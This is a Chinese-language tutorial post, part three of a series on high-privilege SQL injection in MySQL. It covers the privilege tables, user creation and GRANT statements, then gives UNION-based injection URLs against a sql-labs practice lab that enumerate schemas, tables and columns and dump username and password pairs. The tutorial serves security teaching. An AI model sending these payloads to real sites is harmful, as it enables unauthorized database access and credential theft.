SQL注入之高权限注入(三)

SQL注入之高权限注入(三)

在数据库中区分数据库系统用户和数据库普通用户

MySQL中存在控制权限的表,分别为user,db,tables_priv,columns.priv表

User表:

存放用户账户信息以及全局级别(所有数据库)权限,决定了来自哪些主机的哪些用户可以访问数据库实例,如果有全局权限则意味着对所有数据库都有此权限

Db表:

存放数据库级别的权限,决定了来自哪些主机的哪些用户可以访问此数据库

Tables_priv表:

存放表级别的权限,决定了来自哪些主机的哪些用户可以访问数据库的这个表

Columns_priv表:

存放列级别的权限,决定了来自哪些主机的哪些用户可以访问数据库表的这个字段

Procs_priv表:

存放存储过程和函数级别的权限

查看MySQL有哪些用户

复制代码
select user,host from mysql.user;

查看用户对应权限

复制代码
select * from user where user='root' and host='localhost'\G;  #所有权限都是Y ,就是什么权限都有

创建用户

复制代码
CREATE USER 'finley'@'localhost' IDENTIFIED BY 'some_pass';
create user 'test1'@'localhost' identified by '123456';
identified by '123456';设置密码

把普通用户变成管理员

复制代码
GRANT ALL PRIVILEGES ON *.* TO 'test1'@'localhost' WITH GRANT OPTION; 

删除用户

复制代码
drop user finley@'localhost';

只提供id查询权限

复制代码
grant select(id) on test.temp to test1@'localhost' identified by '123456'; 
grant select(id) on test.users to test1@'localhost' identified by '123456' 

在 MySQL 数据库中为用户 'test1'@'localhost' 授予对表 temp 中 id 列的 SELECT 权限, 同时为用户设置密码 '123456'

select * from users; 会报错

select id from users;不会报错

当前用户必须是root,高权限,不然不能跨库查询

复制代码
查看当前服务器网络的所有数据库: schema_name,schemata
http://192.168.x.x/sql-labs/Less-2/?id=-1 union select 1,2,group_concat(schema_name) from information_schema.schemata 
查看数据库test中,有哪些表,
http://192.168.x.x/sql-labs/Less-2/?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='test'
查看表中的字段名
http://192.168.x.x/sql-labs/Less-2/?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='test' and table_name='users';
查看数据
http://192.168.x.x/sql-labs/Less-2/?id=-1 union select 1,2,group_concat(username,'~',password) from users

http://localhost/sql/Less-2/?id=-1 union select 1,2,group_concat(name,'~',pass) from test.users
相关推荐
镜舟科技22 分钟前
Databricks 再提 LTAP,AI 时代的数据底座为何重回大一统叙事?
数据库·架构·agent
Databend1 小时前
从湖仓升级为 Agent 时代的数据控制面,Snowflake 和 Databricks 有哪些布局
大数据·数据库·agent
ClouGence4 小时前
SQL Server CDC 能放到 Always On 备库读吗?一文讲透原理与实践
数据库·sql server
先吃饱再说1 天前
存储的进化:从 MySQL 到浏览器缓存,数据到底住在哪?
数据库
Nturmoils1 天前
字段太多看不全,ksql 的展开模式和输出控制怎么用
数据库·后端
Databend1 天前
Agent 轨迹分析与归因的数据工程实践
大数据·数据库·agent
这个DBA有点耶1 天前
SQL改写进阶:标量子查询的“隐形代价”与消除实战
数据库·mysql·架构
smallyoung1 天前
数据库乐观锁深度解析:MySQL、PostgreSQL 实战 + Spring Boot 集成指南
数据库·mysql·postgresql
parade岁月1 天前
MySQL JOIN解析:朴实无华但食之有味
数据库·后端
用户3169353811831 天前
MySQL服务无法启动问题解决全记录
数据库